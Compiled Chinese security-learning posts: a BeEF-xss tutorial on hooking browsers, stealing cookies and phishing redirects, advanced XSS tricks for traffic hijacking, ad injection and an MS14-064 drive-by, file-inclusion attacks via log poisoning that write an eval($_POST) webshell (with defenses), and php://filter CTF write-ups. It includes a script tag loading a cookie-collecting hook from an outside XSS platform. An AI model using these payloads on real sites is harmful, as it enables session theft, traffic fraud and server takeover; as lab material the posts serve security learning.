Kali下安装与使用BeEF-xss 早八人，护网在即，该学习了~前言BEEFXSS（Browser Exploitation Framework XSS），更常见的称呼是BeEF（The Browser Exploitation Framework），是一个开源的浏览器漏洞利用框架。它由Michał Zalewski于2006年创建，旨在帮助渗透测试人员评估Web浏览器的安全性，发现并利用其中的漏洞。xss基础篇：https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQxssWAF绕过篇：https://mp.weixin.qq.com/s/P2AX2ebnzaCw-NoNwLwIRA工具使用更新源apt-get update 安装apt-get install beef-xss 输入账号密码，本身默认的密码和账号分别为 beef 和 beef启动beef-xss得到js文件攻击载荷即XSS的js脚本地址，链接为你的IP地址+端口下的js访问面板 http://:3000/ui/panl账号：beef， 密码：是你在上面输入的密码（这里我输入的是：root）存储型xss利用，当然也可以使用其他具有xss漏洞的平台，比如xsslabs使用script标签链接你攻击机器的脚本地址，提交即可好，找到一个具有xss漏洞的界面，执行script这里已成功上限log日志，获取浏览器的基本信息，当前在哪个页面，是否聚焦，鼠标在那个位置等等获取cookie选中靶机，在Command面板找到GetCookie命令并执行，比如获取cookie，这里直接获取到了cookie信息配合钓鱼重定向，即你访问具有存储型XSS的界面的时候，他会自动跳转到你预设的链接（钓鱼）地址引导下载当然也可以将跳转的链接转化为图片，比如使用img标签，链接到这个图片如果payload过长输入不了就可以使用短链、短链生成一些好玩的命令命今颜色(Color):绿色对目标主机生效并且不可见(不会被发现)橙色对目标主机生效但可能可见(可能被发现)灰色对目标主机来未必生效(可验证下)红色对目标主机不生效beef-xss主要模块Browser：此模块主要针对浏览器进行信息收集或攻击。其子选项卡“Hooked Domain”能够获取HTTP属性值，如cookie、表单值等，并执行简单的浏览器操作，例如替换href值、弹出警告框、重定向浏览器等。部分模块会根据受害者的浏览器类型来决定是否显示，主要涉及浏览器通用操作和其他基本信息检测。Chrome Extensions：此模块专门针对谷歌浏览器的扩展插件进行信息收集或攻击。Debug：提供调试功能，用于测试和修复Beef框架中的问题。Exploits：此模块利用已公开的漏洞进行攻击测试，帮助用户了解系统或应用的安全性。Host：针对主机进行信息收集，如检测主机的浏览器、系统信息、IP地址、安装软件等。IPEC：负责协议间通信，主要用于连接和控制受害者的浏览器。Metasploit：Beef可与Metasploit平台联合配置，一旦有受害者出现，可通过信息收集确定是否存在漏洞，进一步方便进行Metasploit攻击测试。Misc：包含一些杂项功能，提供额外的工具和选项。Network：进行网络扫描，帮助用户了解网络环境和潜在的安全风险。Persistence：维护受害者访问，确保长时间对受害者进行监控和控制。Phonegap：针对手机设备进行测试，帮助用户了解移动设备的安全性。Social Engineering：利用社会工程学方法进行攻击，通过诱导、欺骗等手段获取受害者的敏感信息或执行恶意操作。听说护网很激烈啊ოර⌄රო ~~~~

phpStudy 小皮 Windows面板 存在RCE漏洞（nday） https://mp.weixin.qq.com/s/VcD3Gb8oTk0d5bW72e0P-A

XSS高级用法，SEO，挂ma，MS14_064利用 XSS高级用法，SEO，挂ma，MS14_064利用以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作！！！xss平台：https://xssaq.com/<sCRiPt sRC=//xs.pe/PNb></sCrIpT> 这里有一个xsslabs，利用我们的payloadxss平台已上线查看功能这里面有源码，xss站点的ua头，还有存储用户cookie信息机器的真实IP地址地址很明确，是我自己的地址广告传播/SEO优化/刷取流量原理通过恶意的xss代码将正常的页面跳转到目的地的页面，利用网站进行重定向实现引流、广告位传播等等。实操恶意刷取访问量，网页直接跳转<script type="text/javascript">window.location.href="跳转的目的地址";</script> <script type="text/javascript">window.location.replace("跳转的目的地址");</script> <script type="text/javascript">window.location.assign("跳转的目的地址");</script> 注入成功，再次访问这个页面就会自动跳转到你的页面，从而达到访问量+1第二种，网页延迟跳转<script type="text/javascript"> 　　function jumurl(){ 　　window.location.href = 'https://www.baidu.com'; 　　} 　　setTimeout(jumurl,3000); </script> 恶意广告展示（需要5块钱吃外卖的记得扫个码嘞，美团优惠卷+平台双减）<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://pic1.zhimg.com/v2-656b7df981ea18d18f196995f477d75d_xll.jpg?source=32738c0c&needBackground=1></iframe>");</script> 三、网页挂马/权限提升（MS14_064）目的  通过木马服务器（kali）搭建生成一个恶意URL地址，并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面，恶意攻击者便获取到了受害者的控制权限（重点在于目的系统是否打了相应补丁）环境木马服务器（kali MS14-064 IP:192.168.7.129） 受害者（Windows Server 2003 R2 IP:192.168.7.136） 存在 XSS 的服务器（Win10 DVWA靶机 IP:192.168.1.103）MS14_064：受影响的操作系统版本有：Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.打开msf搜索 ms14_064依次设置好参数没有成功，不知道为什么，我win7补丁都卸载了，这里只做演示，可以参考下文https://blog.csdn.net/theRavensea/article/details/136793078 XSS插入地址这个时候就能利用存储型xss漏洞将木马服务器生成的地址插入到网站中，这样只要有人的电脑存在该漏洞，就能上线：可自行测试，我这里不是全新的win7，没有成功学习于：https://blog.csdn.net/Aaron_Miller/article/details/105918848  

从零开始学习文件包含 从零开始学Web安全，文件包含漏洞详解大家好，我是[小羽]，一个对网络安全充满热情的小白。今天，我将与大家分享我的网络安全中的Web安全学习笔记什么是文件包含漏洞？，这里很详细的介绍了Sql注入的各种类型防御的方法。靶场：dvwa,pikachu服务器：centos7数据库：mysql5.7php：8.0nginx：1.24什么是文件包含漏洞？概述和sql注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，让服务端执行。包含：把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。有时候由于网站功能需求，会让前端用户选择要包含的文件，而开发人员有没有对要包含的文件进行安全考虑，攻击者就可以通过构造恶意的文件路径参数来执行任意的代码。常见的文件包含漏洞有两种类型： 本地文件包含（Local File Inclusion）：LFI本地文件包含漏洞是指攻击者能够利用应用程序的漏洞，直接访问并执行服务器上的文件。 远程文件包含（Remote File Inclusion）：攻击者能通过将一个远程文件包含到应用程序中来执行任意代码，这种漏洞通常存在在于动态包含外部资源的代码中。 攻击者可以利用文件包含漏洞来执行一系列攻击，比如读取敏感文件、执行恶意代码、获取数据库信息等。以PHP为例，常用的文件包含函数有以下四种 函数 描述 特点 require() 找不到被包含的文件会产生致命错误，并停止脚本运行 在一开始就加载 include() 找不到被包含的文件只会产生警告，脚本继续执行 在用到时加载 include_once() 如果该文件的代码已经被包含，则不会再次包含 与include()类似 require_once() 如果该文件的代码已经被包含，则不会再次包含 require()类似 漏洞利用过程一、本地文件包含漏洞(LFI)php代码示例：<?php $file=$_GET(['filename']); include($file) ?>python代码示例：file=request.GET.get('filename')#django with open(filename,mode='r') as f: print(f.read())我们可以利用文件包含读取到一些其他文件，甚至可以读取一些系统的敏感信息如系统的配置器文件:C:Windowssystem.ini文件（很危险）DVWA首先在我们centos系统中根目录创建一个demo1.txt写入'you are very good hacker!'进入dvwa靶场File Inclusion点击任意文件后，观察到url的变化为文件名称的变化 使用../../../../../../../demo1.txt尝试读取刚才创建的文件demo1.txt漏洞利用成功！此时也可直接读取系统配置文件例如hostsPiKaChu选择下拉框任意选项，分析url，找到文件名称如下图 使用../../../../../../../demo1.txt尝试读取刚才创建的文件demo1.txt注意：在文件包含漏洞中通常配合文件上传使用二、远程文件包含漏洞远程文件包含漏洞就是在不同ip/域名之间进行文件包含操作，需要将php.ini中的allow_url_include = On打开，如下图比如这里有一个远程文件：https://xiaoyus.cc/license.txt漏洞利用成功！三、包含Apache/Nginx日志文件有时候网站存在文件包含漏洞，但是却没有文件上传点。这个时候我们还可以通过利用Apache的日志文件来生成一句话木马。我们通过访问，让访问日志记录我们的phpinfo();代码，可以看出，访问日志已经成功记录了我们的访问历史：注意：需要开启服务器记录日志功能<?php phpinfo();?>日志访问成功但是我们发现了日志使用的是url编码，而不是完整的php代码这里我们就需要使用到抓包工具burp suite进行请求拦截，然后修改参数值为完整的php代码查看日志，日志写入成功接下来利用文件包含漏洞访问日志的文件地址我这里是www/server/nginx/logs/access.log日志文件注入成功！让访问日志文件记录下写入文件脚本代码：<?php $file=fopen('test1.php','w'); fputs($file,'<?php @eval($_POST[666]);?>'); ?>访问内容修改： 可以看见日志文件写入成功 对访问日志进行文件包含，并查看创建的一句话脚本，已经创建成功：查看源文件，也可以看到创建成功 此时就可以使用蚁剑进行连接获取webshell如何避免？一、设置白名单代码在进行文件包含时，如果文件名称可以确定，可以设置白名单对传入的参数进行比较。PHP验证源码示例：<?php $file_list=[ //声明一个变量，用于存放白名单； 'framework/init.php', 'framework/route.php', 'framework/event.php', ]; $file= $_REQUEST['file']; //声明一个变量，用于接收传递过来的文件信息； if (in_array($file, $file_list)){ //把传递过来的文件信息和白名单里面的文件进行对比； include "$file"; //如果传递过来的文件是白名单里面的文件，就对它进行文件包含； } ?>python验证源码示例：file_list=[ 'framework/init.php', 'framework/route.php', 'framework/event.php', ] file=requests.GET.get('file') if file in file_list: with open(file,mode='r') as f: content=f.read() print(content) else: print('该文件不在许可范围内')二、过滤危险字符由于Incbude/Require可以对PHP Wrapper（包装器）形式的地址进行包含执行(需要配置php.ini)在linux环境中可以通过"../../"的形式进行目录绕过，所以需要判断文件名称是否为合法的PHP文件。验证源码示例：$pattern= "#^[a-z][a-z0-9+.]*:?//#i"; if(substr($filename,-4)=='.php' && strpos($filename,"..")===false&&!preg_match($pattern, $filename)){ include "$file"; }python源码示例：import re import os parttern='"#^[a-z][a-z0-9+.]*:?//#i' def include_file(filename): if filename.endswith('.php') and '..' not in filename and not re.search(pattern,filename(): with open(filename,'r') as f: file=f.read() print(file) include_file('demo.php')四、设置文件目录PHP配置文件中又open_basedir选项可以设置用户需要执行的文件内目录，如果设置目录的话，PHP仅仅在该目录内进行文件搜索，而不会去搜索其他文件四、关闭危险配置PHP中的allow_url_include选项如果打开，PHP会通过Include/Require进行远程文件包含，由于远程文件的不可信任及其不确定性，在开发中禁止打开次此选项，PHP默认是关闭的。五、最小权限原则做好管理员权限划分，做好文件的权限管理，allow_url_include和allow_url_fopen最小权限化感谢！原文地址https://mp.weixin.qq.com/s/0Ayr8cp5nxti787c1sg54g

文件包含_PHP filter伪协议利用方式 前言本文主要讲解php filter伪协议，文件包含漏洞php://filter伪协议是PHP中独有的一种协议，它是一种过滤器，可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据，且在读取和写入之前对数据进行一些过滤，例如base64编码处理、rot13处理等。php://filter伪协议主要用于一体式（all-in-one）的文件函数，如readfile()、file()、file_get_contents()等，这些函数在数据流内容读取之前没有机会应用其他过滤器，而php://filter伪协议则可以在读取或写入数据时对数据进行过滤处理。基本语法php://filter伪协议的基本语法如下：php://filter/<action>/resource=<待过滤的数据流><action>：表示要对数据执行的过滤操作，如读取（read）、转换编码（convert）或字符串操作（string）等。<待过滤的数据流>：通常是要读取或写入的文件路径或URL。过滤器分类php://filter伪协议支持的过滤器主要分为以下几类：字符串过滤器：以string开头，对数据进行字符串处理，如rot13、toupper、tolower、strip_tags等。string.rot13：使用当前字母在字母表后第13个字母替换当前字母。string.toupper、string.tolower：将字符串转换为大写或小写。string.strip_tags：去除字符串中的HTML、XML和PHP标签。转换过滤器：以convert开头，对数据进行编码转换，如base64编码、解码，quoted-printable编码、解码，iconv字符编码转换等。convert.base64-encode/decode：对数据进行Base64编码或解码。convert.quoted-printable-encode/decode：对数据进行Quoted-Printable编码或解码。convert.iconv..：对字符串进行字符编码转换。压缩过滤器：如zlib.deflate（压缩）、zlib.inflate（解压）、bzip2.compress（压缩）、bzip2.decompress（解压）等。加密过滤器：如mcrypt.、mdecrypt.等，用于数据的加密和解密。使用示例以下是一些使用php://filter伪协议的例子：读取文件并进行Base64编码：php复制代码 echo file_get_contents("php://filter/convert.base64-encode/resource=index.php");这行代码会读取index.php文件的内容，并将其进行Base64编码后输出。写入文件并进行Base64解码：php复制代码 file_put_contents("php://filter/write=convert.base64-decode/resource=shell.php", base64_encode("<?php phpinfo(); ?>"));这行代码会将Base64编码的字符串写入shell.php文件，并在写入前进行Base64解码，最终shell.php文件中将包含原始的<?php phpinfo(); ?>代码。注意事项在使用php://filter伪协议时，需要注意过滤器的选择和数据流的指定，以确保数据的正确处理和安全性。在某些环境下，出于安全考虑，可能会对php://filter伪协议的使用进行限制或禁用。靶场复现实战之前，请大佬来吃瓜题1题目ctfshow这里我们的练习题目是，ctfshow的web87，分析源码，file_put_contents函数，将$content的内容（前面附加了一段PHP代码<?php die('大佬别秀了');?>）写入到URL解码后的$file指定的文件中。这段附加的PHP代码会在文件被包含或执行时显示"大佬别秀了"这里，我们可以将我们的payload和这段die代码，对他进行base64编码，发现都是乱码如果我们在base64编码前面加几个字符呢，我们的php一句话木马就可以直接读出来了我们将他复制到这里，进行传参绕过方式参考：全编码工具推荐棱角社区的https://forum.ywhack.com/coding.php首先将我们的payload进行全编码然后再使用ur编码对目标文件进行传参?file=【你的payload】此时我们去访问我们上传的php代码，文件列表已经列出来了找到源码题2ctfshow的练习web116提示只有这一个视频查看源码也没发现什么东西那就从文件下手我们拿010编辑器看文件尾部，发现是一个图片结束的16进制的图片文件图片进制表这里我们查找有没有png的内容找到指定选项从这里开始一直到最后，把他复制下来新建一个文本文件粘贴保存png图片发现是源代码，检查过滤协议发现file和php协议没有过滤，抓包即可，php协议测试file协议测试